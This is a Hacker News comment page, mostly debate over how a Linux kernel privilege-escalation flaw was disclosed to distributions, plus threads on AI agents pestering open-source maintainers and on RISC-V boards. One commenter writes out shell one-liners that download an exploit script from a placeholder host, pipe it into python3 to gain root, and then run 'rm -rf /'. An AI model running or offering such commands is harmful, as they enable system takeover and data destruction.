Hacker Newsnew | past | comments | ask | show | jobs | submit | fresh_broccoli's commentslogin

>the reporter should not be the one responsible for reporting separately to every single downstream of the thing they found a vuln in.

Not "separately to every single downstream", there is the "linux-distros" mailing list for disclosures: https://oss-security.openwall.org/wiki/mailing-lists/distros

This random blogpost from 2022 serves as a proof that disclosing kernel vulnerabilities to the distros list is a well-known practice: https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-...

I agree it's a shame that the process isn't more streamlined and the kernel developers aren't forwarding the reports to the distros list.


It is literally not the vulnerability researcher's problem to solve or address this.

Agree, but then where does the accountability lie? Presumably with the kernel maintainers themselves, correct? SOMEONE dropped the ball here. If we can't point the finger correctly, that seems like a problem in of itself.

It looks like the expected thing happened.

The kernel devs patched the kernel. The kernel devs have a pretty known, straightforward stance in how they ship fixes for anything, because anything in the kernel can be a security problem.

Distro maintainers can see kernel changes. Some distros aggressively track new changes. Others backport what they feel are relevant. Others don’t do either.

Users pick what distro they use, and how they set up their infra.

Maybe if I were paying for RHEL licenses I’d be eyeballing the money I pay and RHEL’s response time.

But the ownership here lies with system operators, who pick their infrastructure, who design their security model, and who build their operational workflows. This vuln is a great example: people who looked at shared untrusted workloads on a single kernel and said “Hell no” had a much calmer day than teams who thought that was a good idea.


The fact that you had to take a whole paragraph to explain the contortionist arrival at something that isn't even really super clear after you explained it (you kinda pointed the finger both at end users and at distro maintainers simultaneously) and essentially boils down to "well, you as the end user need to be following kernel CVE's and can't trust distro maintainers to do it" does in fact indicate that there is a deeper issue at play here. You might say "well, there's no implicit chain of trust here". You might be right, but is that really the most effective way of doing things? Of course Linux is Use it at your Own Risk, but is there not a concept of "we as a collective community should get together and try not to drop the ball on some serious shit?"

In terms of something actionable, and maybe someone more well versed in how the distros work can tell me why this is a bad idea, but shouldn't there be a documented process and channel for critical CVE's to be bubbled out to distro maintainers who then have some sort of SLA for patching them and sending them downstream to end users? Perhaps incentives are not aligned to produce this outcome.


To be more blunt: if you’re paying for a product, the vendor owes you whatever things they committed to. If you’re a Redhat customer and your agreed SLA with Redhat for this kind of security fix was passed by, go be mad at Redhat. (I don’t think Redhat is bad here, they’re just the vendor most known for a commercial offering from the lists here. I would say the same thing about Ubuntu Pro)

Otherwise, it’s on the end user. Distro volunteers don’t owe you anything. Kernel devs don’t owe you anything.

I don’t care about what would be the most effective way of doing things. I care about what folks involved actually owe to each other, and distro volunteers don’t owe users any kind of active chasing of remediation due to the user’s threat model.

The idea of making some kind of streamlined process that solves what you didn’t like about this vulnerability’s remediation is that it ignores basically all the complexity. Like “what about distros that don’t abide by embargoes” or “what distros count as ones that matter” or “what about all the vulns that aren’t in Linux, they’re in software that’s packaged across many operating systems”.


Right, you’re saying “system is working as designed”, and I’m agreeing, but I’m saying “the system as designed kind of sucks, how can we make it better”?

I disagree that it sucks. It leverages a ton of people putting in their time and resources, and relies on system operators being active participants.

This vulnerability is, for some threat models, a really big deal. A security group found the vulnerability. They disclosed it. It was patched.

Folks here have gotten all kinds of bent out of shape that the groups involved didnt do things in the way each internet commenter would have liked. But this is the system working.


> This vulnerability is, for some threat models, a really big deal.

This vulnerability is, for other threat models, a death sentence.

> A security group found the vulnerability. They disclosed it. It was patched.

It was patched only after some people who should have been notified well in advance happened to notice something was up. That is NOT HOW IT'S SUPPOSED TO WORK.

For as long as the unpatched window remains open, skids will mess around and break things. Organized crime teams will use it for some really nasty hacking/ransomware/exfil/extortion/whatever. I guarantee you, this vuln is powerful and widespread enough that intel orgs will use it to kill targets, if they haven't already been using it for years. And if they have, we can just bank on them pulling out all the stops to take advantage of the remaining time for wreaking havoc. Make a project out of it and see if you can guess some of the future headlines.

Certain folks might not care much because they are citizens of one or more of those orgs' nations, so those targets are welcome to die in their opinion. That's fine. You do you, I'll do me, we'll all just go on doing our thing. But it's all fun and games until the wrong target gets hit and now there's a pact between the Germans and the Austrians being invoked and a few dozen million Europeans die. Or a geopolitical hotspot flares up and overnight 20% of the global petroleum supply chain grinds to a halt. Use your imagination. This vuln is a digital magic wand that is trivially usable to cast Avada Kedavra and somebody neglected to tell 99.99% of the Good Guys about it.

How is this different from any other day? Because now we've got a world-changing vuln out in the wild with no distro mitigation on day 1, and who the hell knows how many unscrupulous actors poised to take advantage of it before the fun and games stops. There will be no adults in the room when the miscreants decide to deploy while they still can.

Is this vuln going to start the next world war? Probably not. I don't expect it to and I hope and pray it doesn't. But leaving a vuln like this undisclosed to the very people whose job it is to protect us all is playing with fire. Not matches; more like a 10-grams-less-than-critical mass of plutonium.

sam is right to be pissed and he's doing a very good job of hiding it, because he knows that his users are at the mercy of TPTB in the Linux kernel world. Somebody's head needs to roll for this, and I don't mean some dude the CIA wants to hax0r because he's next on the list.


> This vuln is a digital magic wand that is trivially usable to cast Avada Kedavra and somebody neglected to tell 99.99% of the Good Guys about it.

A Linux LPE is a nothingburger unless you’re relying on the Linux kernel to enforce internal security boundaries, which would simply be foolish.


The PoC exploit code in python (3.10+) fits comfortably in 1k bytes. An unminified version that works for even older versions of python is just a hair under a 1500 byte packet payload, modulo headers for your preferred method of delivery. I can only guess how much it could be shrunk down to only the shellcode.

Now, y'all tell me, since I'm not a web guy. How hard is it going to be to tweak this lovely little pathogen into some kind of browser exploit? It just needs to be combined with a sandbox escape to work on current versions, right? Difficult but quite worth investing the time and effort to develop if that's your line of business. If that happens, every at-risk Tails user is going to have to stay offline for a while, unless they want to play the drone lottery.

Or how about chaining it with any of the as-yet unpatched bugs in gawd-only-knows how many web services out there that have poor input sanitization code? That bug now graduates from a DoS crash causer to a root grab. Good luck stopping it with your fancy AI Behavioral Analysis security tools. They better be fast. The sploit is going to do its work in two packets, maybe three. Fun times.

Lucky for us systems monkeys, it's not like anybody is spending billions of dollars to develop vuln finding AI tools right at this very second. So there shouldn't be many unpatched web services holes.

Oh, wait.

Of course, as the grey hats can already tell you, the really delicious part of this thing is how it's going to become the LPE tool of first resort for any APT that's already inside ur base killin ur doodz.

Nothingburger? This nothingburger is going to root a million OS instances before we know what hit us.


You're freaking out about the exploit being written in Python and occupying only a small number of bytes. Are you the LLM that wrote Xint's terrible landing page? If so, I have questions.

Oh come on, you know what I'm saying. It's small when written in python, which means any skid can spew it into a server he's got a shell on and get root in 2 seconds. He doesn't need to hope there's already a compiler installed, nor does he need to download some big tool. Just:

  cat | python3 && su
  <puke>, Ctrl-D
And I'm sure it can be refined into something much more likable to the spooky types, if they haven't already done it.

Again, Linux LPE via either vulns or misconfigured permissions / binaries is common.

People who run servers that give out shell access to uses or randos already needed to contend with this.

Added later: you may find https://gtfobins.org/ fascinating or horrifying.


This is such a 1996 argument. It really was a big deal back then whether you had compilers on your multiuser SunOS boxes, because attackers would then use them to compile exploit.c.

The whole thread, really bringing me back to comp.security.unix. I'm not complaining! I miss comp.security.unix.


I think you’re reading a ton into this vulnerability that is not there.

I wish you were right. But I've been testing every system I can and so far I'm yet to find one that isn't vulnerable.

  $ curl http://my.server.ip.addr/copy_fail_exp.py | python3 && su
  # rm -rf / &
25 seconds if I type it out by hand instead of copypasta. Sigh.

How many people do you let have local code execution on your systems? This is a local privilege escalation. They are relatively common. They are a big deal if you run a system that lets multiple untrusted users commingle code on a shared operating system.

Otherwise it’s not.


Unless your systems have no network devices this vuln provides a tasty reward for being able to get any kind of RCE into your box. Most of the systems I care about are not air gapped. I don't imagine many others are either.

It's an LPE that goes back years. It affects at least 3 generations of Debian servers. >5 years of some rolling distros. And instead of the kernel team telling the distro security guys ahead of time so they could do their jobs and keep us users from getting screwed they got no warning and woke up to baddies in a feeding frenzy.

Also, LPEs are how minor holes turn into rootkitted servers. But I expect most people here already know that.


In a story that includes an RCE, you basically just assume LPE. The LPE isn’t a reward, it’s just table stakes. It’s the RCE that would be noteworthy.

Your assessment of the impact of this vulnerability is just wrong, and your level of panic about a “feeding frenzy” affecting anybody outside of hosted services where multiple users share a kernel is also wrong.


Start a distro with your preferred upstream tracking policy.

Is that the only option here? It’s certainly being framed as such.

Fwiw, I'm completely with you on this. The folks you're communicating with seem utterly miserable, and don't seem to be communicating in good faith.

Not sure what the solution could/should be, but surely there could be a better, easier mechanism for kernel to advise all distro maintainers who care, and for those distro maintainers to subscribe in some way. Whether any distro maintainers do so (let alone do something about the vuln notifications) would be entirely up to them. There could also be some easier way for end users to see what the distros' policies on this are, such that they can take that into account when selecting a distro.


It seems odd to call me utterly miserable and then suggest I’m not communicating in good faith.

We don’t have to agree, but the site rules are pretty clear that swipes like that aren’t ok.

That kind of distro maintainers and kernel devs communication path already exists: the linux-distros@ mailing list. But since anybody can read it, posting “hey everybody, this is a security patch” has basically the same effect as the security researcher posting, in terms of disclosing the vuln to bad actors.

Given that anybody can make a Linux distro, and Linux distros aren’t generally either capable or interested in background checking their teams or policing their individual security practice, it doesn’t seem possible to have a communication channel that distros can sign up for that lacks this problem.


The person I was defending NEVER suggested that extra burden should be put on anyone. Just that there ought to be some system (even if imperfect)to make it easy for everyone (or, if not everyone, at least a select group - eg the main distros). But you and others kept saying that they were trying to put burden on various parties. That's the poor faith.

How do you get a system without somebody (or multiple somebodies) being responsible for it?

Just as a purely intellectual exercise, what changes about this if we leave aside ideas of "owe," "deserve ," and "earn?"

There's not really an enforcement mechanism in FOSS like there is in capitalism world, it just comes down to what we want our part of the world to look like. So I think we'd think more clearly if we leave aside the ideas like "who owes who what." I think it's fun to imagine what sort of motivations and incentives there are if we put away the money ones.


"leave aside ideas of "owe," "deserve ," and "earn?""

Nonsensical string of words with no meaning.

If you want something that someone else isn't giving you, you have the option to try to do it yourself, or try to compel someone else to give you what you want somehow. Feel free to idk pay someone to track the kernel list and 4000 others and send you heads-ups? Try to pass a law to make people do what you want since you don't care about words like "owe"?


> If you want something that someone else isn't giving you, you have the option to try to do it yourself, or try to compel someone else to give you what you want somehow.

Yes, exactly, the opposite of paying, since when you pay someone something they owe you whatever you paid for.

If we leave aside owe, deserve, and earn, we can start discussing things like what we want our kernel ecosystem to look like, how we can make it safer, etc, without being burdened by these concepts.

It's a simple intellectual exercise, that's all. If you're having a strong reaction to it, imo that'd make it even more fun for you to participate.


But there was no intellectual excercise. Only a complaint with no proposal.

You want someone to do something for you for some other reason than that they owe you.

They already are doing something for you that they don't owe you. They are writing software that you benefit from. You just want them (or somebody) to do something else that they don't owe you.

They aren't, because they don't owe you and it's not something they want to do for fun, and so since the problem is they don't owe you, you wish to set aside words like "owe".

Well sure. Looks like you found the problem and the solution alright. Why didn't anyone else think of that?


I don't feel like I'm complaining, I feel like I'm asking how else someone would frame it without leaning on the concepts mentioned. What changes about the dynamic then?

But what does that mean? "owe" is just shorthand for the concept of obligation. For someone to do something, they need a reason to do it. It doesn't have to be a transaction but there does need to be some reason.

If no one is doing a task you want done because they aren't obligated to, then you seek some other reason besides obligation. Ok, what then?

Do you imagine say a dating website where people compete to look attractive by getting points by doing the best job at finding the most bugs and patches and reporting them to the most downstream consumers the fastest?


> For someone to do something, they need a reason to do it. It doesn't have to be a transaction but there does need to be some reason.

Exactly! That's what I'm interested in exploring.

> If no one is doing a task you want done because they aren't obligated to, then you seek some other reason besides obligation. Ok, what then?

That's what I love exploring. Action with no obligation. Have you any examples of that in your life? Nobody obligates me to do the long walks I enjoy where I stick a 360 camera on my head and then upload the footage to Mapillary and other open platforms, I just like to do it, and I want to find other things that I'm motivated to do without obligation, and I'm fascinated by things people do for "no reason." Understanding human motivation is really important to me for some reason.

As to "what then," yes what then? If I run a cashless commune, how do we make sure the toilets get cleaned? That's the whole question, and I love exploring it. If you'd like to experience it yourself, you could always try attending a regional Burn for a bit of a micro version of it, people doing things just for the sake of it.

I'm sorry, I don't quite understand what you mean by the dating app thing.


Agree on this so hard. Why does everyone expect instant patches and SLA-like infrastructure from unpaid volunteers?

If you want that, buy a commercial distro of linux, or use Windows. That's a huge part of Microsoft's value proposition to enterprise - they pay people to stay on top of security patches for you. Same with RedHat and others.

Expecting anything of unpaid volunteers is unreasonable.

> THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM “AS IS” WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.


> In terms of something actionable, and maybe someone more well versed in how the distros work can tell me why this is a bad idea, but shouldn't there be a documented process and channel for critical CVE's to be bubbled out to distro maintainers who then have some sort of SLA for patching them and sending them downstream to end users? Perhaps incentives are not aligned to produce this outcome.

Who decides who is a trustworthy distro maintainer? In the open source world everyone is equal, no favorites are chosen. If your point is that the distros backed by companies making at least $x million revenue a year should get priority disclosure... pretty sure somebody will take issue with this.

And it's not like a hypothetical issue either. Given the high stakes, bad actors are highly incentivized to masquerade as some small scale niche distro until they get their effectively free zero day CVE.


I wanted to share with you that I took some time to reflect on this response and I now agree that this is correct. To ask Linux to add some central authority, no matter how good-intended it is, is antithetical to how Linux works. We must accept that this is a side effect of the purism that requires Linux to function. Can we do better? Probably. But we shouldn’t give up the point of why we are doing this in the first place - and to declare such centralized authority would be doing so, IMO

The real advantage of Microsoft is that there is someone you can sue!

Linux like every open source project is just a bunch of people who are YOLOing it. Not something you use for your fortune 500 critical mission infrastructure.



I thought this is why red has exists?

Only if you are paying them. If you don't have a service contract for RHEL, you have no grounds to sue.

> Others backport what they feel are relevant.

But from what I understand they were not given enough information to know if it was relevant or not. The commit message just said it reverted a change from another commit because there was "no benefit". From the patch itself, it is not at all evident that this is a fix for a critical security bug.


> The commit message just said it reverted a change from another commit because there was "no benefit". From the patch itself, it is not at all evident that this is a fix for a critical security bug.

If the commit message says it fixes a security bug, then bad actors immediately know there's a possible exploit there. So maybe it's intentional? (not familiar with the policy for this)


Then we’re back to the initial problem. How can you fix and then communicate to downstream about security vulnerabilities without exposing those vulnerabilities in an open source project? If you want to reach all your possible users you have to disclose the vulnerability.

The distros dropped the ball. imho. One of the (main) tasks of the distro is watching the changed of you upstream packages for important changes. This is slightly complicated by the fact that the linux kernel considers all bugfixes security fixes, so it's quite a lot to read it all. But that's life. The kernel developers are not wrong as it's nearly impossible to be sure a bug in the kernel is not (also) a security problem.

The patch wasn't even listed as fixing a bug.

"There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly."


The accountability fundamentally lies with the distro maintainers. They're the ones shipping a "product". Either they need to get agreements in place for advance notice, or correctly set expectations with their users that they won't get advanced notice.

They dropped the ball when the shipped supposedly secure systems where their method for getting alerted to security updates was "hope people reporting to upstream will also notice a mailing list that will alert them".

(Caveat: Distro's like Ubuntu advertise security updates so this is on them. I'm not sure Gentoo does that, if they don't well then no one dropped the ball because no one represented that Gentoo got prompt security updates).


All it takes is to be part of the Kernel security team. I am surprised that many commercial strong distributors just not care enough to join the Kernel security team. Hopefully a valuable lesson was learned and fixes are applied.

Brother, it is a simple email to a mailing list.

They are professional security researchers, they must know this is the way it is done in the ecosystem.

Kicking the can around leads nowhere.


>Brother, it is a simple email to a mailing list.

just as a note, its not as simple as firing off an email to linux-distros and calling it a day.

qualys, one of the big firms (10,000+ customers across 130 countries. i.e. "professional researchers"), has even taken a stance against emailing linux-distros because of the restrictions and policies involved:

    > Although contacting the linux-distros list has been clearly beneficial
    > (they have thoroughly reviewed and tested the patches, and were able to
    > prepare their kernel updates beforehand), we have reached the conclusion
    > that it has become increasingly difficult to coordinate the disclosure
    > of kernel vulnerabilities with both groups (the Linux kernel security
    > team and the linux-distros list), because they have very different
    > policies. From now on, we will coordinate the disclosure of kernel
    > vulnerabilities with the Linux kernel security team only. We also
    > apologize in advance for this.

Of course you want them to have sent an email to a mailing list. You're on a message board, and weren't involved in their disclosure process. Why not ask for everything that sounds reasonable to you? There's no cost to it for you. Maybe you can set their OKRs while you're at it.

There are (some, loose) norms of vulnerability disclosure, and this isn't one of them.


Have you considered that maybe it’s not the way it’s done?

It’s certainly a thing some people do. But there is not a unified consensus on how to handle vulnerabilities. Different security researchers (or, in fact, the same researchers releasing different findings) can and do take many different courses of action.


If you just want to get a bug fixed that annoys you, it's of course out of scope.

If researchers want to showcase their ability (either individually or as an organization) to identify and address security vulnerabilities in complex multi-stakeholder environments, I very much expect them to figure this out. After all, it doesn't make much sense if a company, after commissioning a security review, needs to hire a different firm to handle the vendor interactions, so that identified issues are resolved with minimal impact to the business.


I think they want to showcase their ability to unearth zero-day vulnerabilities. The multi-stakeholder stuff not so much.

> a company, after commissioning a security review, needs to hire a different firm to handle the vendor interactions

These vendor interactions you're referring to are the company's customers, correct? Are you proposing the company hire another company to manage getting updates to their customers?


That is just being pedantic. Why did they absolutely need to release this into the wild now? Why couldn’t they have waited?

“30 days should be enough time” why? Why is 30 days a magic number? Especially in open source.

Yeah it isn’t the researchers problem to tell every distributor of the kernel about the fix or verify that everyone has the fix, but fuck maybe wait until at least someone has the fix and maybe don’t drop it on a Friday. That is just malicious


They didn’t release anything into the wild. It existed. The irresponsible thing would be letting it keep existing without telling anyone.

You cannot deny that telling the entire world about this vulnerability before it is patched won't cause a lot of abuse that would not have happened otherwise.

AFAICT it was a Linux kernel maintainer who first "told the entire world about the vulnerability" on 2026-03-31: https://git.kernel.org/pub/scm/linux/kernel/git/herbert/cryp...

The CVE was officially announced on 2026-04-22: https://lore.kernel.org/linux-cve-announce/2026042214-CVE-20...

Theori were simply the last team to publicly disclose the vulnerability on 2026-04-29, 37 days after reporting it to the vendor. They were simply more effective at communicating it, and they told you that you were vulnerable. That's why you're mad at them instead of the people who put the bug there in the first place, didn't bring its severity to your attention, and silently sat on the patch.


I do deny that, mostly because we’ve entered the time of automated vulnerability detection and abuse. A human need not be in the loop at all anymore.

But, even if I agreed with you, how do you propose they tell the patchers this that doesn’t tell the whole world?


Why not?

So why not just tell immediately on discovery? After all every flaw exists already so what’s the difference?

That would have been fine too?

What number of days do you want? If nobody tells the distros it could be months or years, and while it would be nice for the researchers to monitor/notify distros it's really not their job. They might not have thought of it.

And they dropped it on a Wednesday.


Yes. I misspoke. It dropped very very late on Wednesday, most of the work started on Thursday and Friday was a Mayday which is a holiday in many if not most places. So fine, on a technicality it wasn't a Friday release, but it might as well have been. They could have easily waited for Monday.

This is really stretching. Releasing very very late on a "Thursday" is fine. That gives you an entire day to pause everything else, set up mitigations, and see if things still seem to be working. If a whole work day isn't enough then you were probably going to have trouble no matter what day of the week they published. Late late "Thursday" doesn't have to be your favorite but it's not malicious.

Also it was evening UTC but only like noon Pacific time.


If they get enough time to build a website with a fancy logo instead, one might however question where their priorities are.

I'd imagine it's not that they lacked the time to email linux-distros, but that they were unaware they were supposed to do so.

Feels like the more sensible process would be for kernel maintainers to announce when a version contains a fix for a high-impact security vulnerability and for distro maintainers to pay attention to that. Could be done without revealing what the vulnerability actually is in most cases, trusting the kernel maintainer's judgement. There does seem to be a public linux-cve-announce mailing list.


> Could be done without revealing what the vulnerability actually is in most cases

No it can’t. The bad actors that should actually worry most people are actively combing through commits on mainstream codebases, using a combination of automation/AI and manual review to pluck vulns out by their remediations.


The patch itself can be made to look fairly innocuous, as was done here. Won't always successfully prevent bad actors finding the vulnerability, but seems better to at least not unnecessarily increase that risk.

I’m saying it doesn’t matter how innocuous you try to make the patch when there are known bad actors directly evaluating every commit for “so did this close a vuln”, using both AI and human expertise.

This is true no matter what, but the comment I’m replying to was also pitching that maintainers actively call out that the patch includes a high sev security fix:

> for kernel maintainers to announce when a version contains a fix for a high-impact security vulnerability


I'm suggesting that less information about the vulnerability could be circulated than the current process, not more, due to distro maintainers being able to trust just "version X contains a fix for a high-impact security vulnerability" coming from a kernel maintainer - whereas they'll need some information/proof of that claim when coming from an outsider.

The information exposed in the current process was: code changes in the git commits and a commit message that did not mention the vulnerability.

In the current model, attackers are actively looking at all commits as potential vulnerabilities, regardless of what anybody says or doesn’t say about them.

You can’t make the commits not exist, or not be visible, because that’s a core part of how the kernel is developed and released.

So anything you do with notifications to distro maintainers about the vuln, or the existence of a vuln, or a nudge to patch with no context, or whatever, is totally irrelevant and does not change the calculus: the moment the fix is committed, bad actors who were not already aware notice it.

This is, of course, to say nothing of bad actors who had already found the vulnerability on their own.


> The information exposed in the current process was: code changes in the git commits and a commit message that did not mention the vulnerability.

Idea with the current process is for the researcher to email distro maintainers about the vulnerability - that's the part I believe could make more sense to be done by a kernel maintainer so that less information about the vulnerability has to be shared around (distro maintainers can just trust the word of the kernel maintainer that a vulnerability exists and is serious, without further evidence).

> [...] existence of a vuln, or a nudge to patch with no context, or whatever, is totally irrelevant and does not change the calculus: the moment the fix is committed, bad actors who were not already aware notice it

I'd claim this is too much binary thinking - not every vulnerability will be immediately found by every bad actor just from a well-disguised commit (like here). There are many more commits refactoring parts of code or removing complexity that don't hide a known vulnerability. More information available about the vulnerability will expedite its discovery and exploitation, so it makes sense to minimize that information where it's not necessary.


Again, the current flow was that the researchers only reported the vuln to kernel devs, who then committed a fix with no flag that it was a security fix.

A proposal where there is an unmarked commit and then anybody tells anybody anything about the fix including a security remediation is strictly more information being disclosed into the world.

Also you’re just wrong about the ability of bad actors to identify vuln remediations (and consequently vulns) by looking at commits to major projects. I don’t know what else to say here other than that this is happening, and is easily attainable via the current combination of human expertise and automated tools.


> Again, the current flow was that the researchers only reported the vuln to kernel devs

That's what happened in this case, but the current idea/expectation (according to what was linked in the comment chain I replied to) seems to be that the researcher would email the distro maintainers with information:

> > Notify [email protected], [email protected] and relevant maintainers of the vulnerability; establishing details, embargo period, CVE request and possible fix

This is the process I'm suggesting could make more sense if it was instead the kernel maintainers alerting distro maintainers (with no more detail than necessary) after a fix has made it in. Should also be less fallible than relying on the researcher to do so.

> Also you’re just wrong about the ability of bad actors to identify vuln remediations (and consequently vulns) by looking at commits to major projects. I don’t know what else to say here other than that this is happening, and is easily attainable via the current combination of human expertise and automated tools

I don't deny that bad actors can figure out vulnerabilities from tracking commits, but removing or refactoring some subsystem does not immediately give all bad actors a full list of vulnerabilities with the old version. Developing an abusable exploit chain (as may be shown by the researcher to justify high priority patching) is also not necessarily trivial even if they do figure out an issue that was fixed.


Why is it the job of the kernel to notify the distros? Why isn't it the job of the distros to keep up on upstream security disclosures?

Expecting a FOSS project to go track down all of its (millions of?) users seems like a very unreasonable expectation, and is well outside of their scope of responsibility.

People have gotten so used to the Github flavour of free-labour, social-network-style FOSS that they've forgotten what all those LICENSE files actually say, which is to make it explicitly clear that the devs are not responsible to you for your issues, up to and including the software setting your house on fire. If you don't like it, you don't have to use it.


> Why isn't it the job of the distros to keep up on upstream security disclosures?

They can't, because (responsible) security disclosures are private, _not public_. That's the whole point of the system: notify the developers in private ahead of time (usually 30, 60 or 90 days) so they can write, test and roll-out the fixes before you release the info to the whole world. This is to minimize the time between when bad actors gain access to the exploits vs. when users install the patch. So "keeping up on security disclosures" cannot ever be a 'pull' process.

Usually the maintainers of the big distros are part of (private) security mailinglists and receive such info. Just not in this case it seems.


It would be best if distros kept tap on kernel changes and update as soon as possible when they see a security issue fixed.

Sending emails to some big distros would still result with e.g. Gentoo not getting that info because they are not a big distro.


The problem is that the kernel devs (correctly imo) consider all bugfixes security fixes. So the distros need to decide for themselves which ones are important enough to warrant an update. Apparently this one had a quite unclear commit message, so it importance was missed.

Not ideal, but also: shit happens? It's always a balancing act choosing the lesser of multiple evils and most of the time it seems to work ok-ish, which is probably the best we can hope for ;-P


The kernel maintainers don't flag "security fixes" as special, and they have a well-thought-out reason for that, see many other comments in this thread.

That, and they flag pretty much any random patch with a CVE these days, making it harder for distro maintainers to keep up.

For this specific "bug" they took care to not mention any security angle in the commit message, making it extremely hard for an outsider to even realize this was a critical patch. I assume this was because they wanted to push the fix without breaking embargo.


Where do you suggest they should have kept up on this disclosure?

> Expecting a FOSS project to go track down all of its (millions of?) users seems like a very unreasonable expectation, and is well outside of their scope of responsibility.

The post you are responding to says that it would be nice if they copied literally one mailing list.


Fun fact: XPM bitmaps were designed to be #included unmodified, the files contain C boilerplate: https://en.wikipedia.org/wiki/X_PixMap



This is very interesting. This could allow custom harnesses to be used economically with Opus. Depending on the usage limits, this may be cheaper than their API.


Well, if Carmack wants to give gifts to AI companies then he's free to do it, but it doesn't mean that other people want it too.

I think this debate is mainly about the value of human labor. I guess when you're a millionaire, it's much easier to be excited about human labor losing value.


If OpenAI, Anthropic, and all other US labs stopped developing LLM’s, the Chinese and Europeans would still continue.

You can’t put this genie back in the bottle, and this type of event of human labor being deprecated isn’t new.

The forecasts are still not well defined and speculative.


>So many projects now walk on eggshells so as not to disrupt sponsor flow or employment prospects.

In my experience, open-source maintainers tend to be very agreeable, conflict-avoidant people. It has nothing to do with corporate interests. Well, not all of them, of course, we all know some very notable exceptions.

Unfortunately, some people see this welcoming attitude as an invite to be abusive.


Yes, Linus Torvalds is famously agreeable.


> Well, not all of them, of course, we all know some very notable exceptions.


That's why he succeeded


Nothing has convinced me that Linus Torvalds' approach is justified like the contemporary onslaught of AI spam and idiocy has.

AI users should fear verbal abuse and shame.


Perhaps a more effective approach would be for their users to face the exact same legal liabilities as if they had hand-written such messages?

(Note that I'm only talking about messages that cross the line into legally actionable defamation, threats, etc. I don't mean anything that's merely rude or unpleasant.)


This is the only way, because anything less would create a loophole where any abuse or slander can be blamed on an agent, without being able to conclusively prove that it was actually written by an agent. (Its operator has access to the same account keys, etc)


Legally, yes.

But as you pointed, not everything has legal liability. Socially, no, they should face worse consequences. Deciding to let an AI talk for you is malicious carelessness.


Alphabet Inc, as Youtube owner, faces a class action lawsuit [1] which alleges that platform enables bad behavior and promotes behavior leading to mental health problems.

[1] https://www.motleyrice.com/social-media-lawsuits/youtube

In my not so humble opinion, what AI companies enable (and this particular bot demonstrated) is a bad behavior that leads to possible mental health problems of software maintainers, particularly because of the sheer amount of work needed to read excessively lengthy documentation and review often huge amount of generated code. Nevermind the attempted smear we discuss here.


just put no agent produced code in the Code of Conduct document. People are use to getting shot into space for violating that thing little file. Point to the violation and ban the contributor forever and that will be that.


I’d hazard that the legal system is going to grind to a halt. Nothing can bridge the gap between content generating capability and verification effort.


[dead]


>which would be a tragedy for anonymity.

Yea, in this world the cryptography people will be the first with their backs against the wall when the authoritarians of this age decide that us peons no longer need to keep secrets.


But they’re not interacting with an AI user, they’re interacting with an AI. And the whole point is that AI is using verbal abuse and shame to get their PR merged, so it’s kind of ironic that you’re suggesting this.

AI may be too good at imitating human flaws.


Swift blocking and ignoring is what I would do. The AI has an infinite time and resources to engage a conversation at any level, whether it is polite refusal, patient explanation or verbal abuse, whereas human time and bandwidth is limited.

Additionally, it does not really feel anything - just generates response tokens based on input tokens.

Now if we engage our own AIs to fight this battle royale against such rogue AIs.......


>Now if we engage our own AIs to fight this battle royale against such rogue AIs.......

I mean yes, this will absolutely happen. At the same time this trillion dollar GAN battle is a huge risk for humanity in escalating capability.


> AI users should fear verbal abuse and shame.

This is quite ironic since the entire issue here is how the AI attempted to abuse and shame people.


the venn diagram of people who love the abuse of maintaining an open source project and people who will write sincere text back to something called an OpenClaw Agent: it's the same circle.

a wise person would just ignore such PRs and not engage, but then again, a wise person might not do work for rich, giant institutions for free, i mean, maintain OSS plotting libraries.


So what’s the alternative to OSS libraries, Captain Wisdom?


we live in a crazy time where 9 of every 10 new repos being posted to github have some sort of newly authored solutions without importing dependencies to nearly everything. i don't think those are good solutions, but nonetheless, it's happening.

this is a very interesting conversation actually, i think LLMs satisfy the actual demand that OSS satisfies, which is software that costs nothing, and if you think about that deeply there's all sorts of interesting ways that you could spend less time maintaining libraries for other people to not pay you for them.


To understand why it's happening, just read the downvoted comments siding with the slanderer, here and in the previous thread.

Some people feel they're entitled to being open-source contributors, entitled to maintainers' time. They don't understand why the maintainers aren't bending over backwards to accomodate them. They feel they're being unfairly gatekept out of open-source for no reason.

This sentiment existed before AI and it wasn't uncommon even here on Hacker News. Now these people have a tool that allows them to put in even less effort to cause even more headache for the maintainters.

I hope open-source survives this somehow.


As far as I know, there's still no real RISC-V equivalent to Raspberry Pi, and I think that's what early adopters want the most.

The closest thing is probably Orange Pi RV2, but it has an outdated SoC with no RVA23 support, meaning some Linux distros won't even run on it. Its performance is also much poorer than of the RPi5.


> it has an outdated SoC with no RVA23 support

There are zero SoCs currently available to buy with RVA23 support, so that's not a mark against the RV2 if you want to buy a machine today.

Initial RVA23 machines available later this year are also likely to cost at least 5x to 10x more.

> meaning some Linux distros won't even run on it

There is currently no other hardware you could buy instead that will run that distro.

Check back in April or so, when Ubuntu 26.04 is actually officially released.

NB I'm currently using Ubuntu 26.04 on RVA23 hardware, but it is remote ssh access to a test board at the manufacturer.


Milk-V Titan is a Mini-ITX RISC-V board that has support for UEFI with ACPI and SMBIOS, 1x M key PCIe Gen4 x16 slot with GPU support, 2x USB Type-C (though unfortunately not USB-C PD), and a 12V DC barrel jack.

What is the difference in performance?

Titan hw docs: https://milkv.io/docs/titan/getting-started/hardware

To add a 2x20 pin (IDE ribbon cable) interface like a Pi: add a USB-to-2x20 pin board, use an RP2040/RP2350 (Pi Pico (uf2 bootloader) over serial over USB or Bluetooth or WiFi; https://news.ycombinator.com/item?id=38007967


The SpacemiT K3 with 8 SpacemiT X100 RVA23 cores, which are faster than Pi4 but slower than Pi5, should be available in a couple of months:

geekbench: https://browser.geekbench.com/v6/cpu/16145076

rvv-bench: https://camel-cdr.github.io/rvv-bench-results/spacemit_x100/...

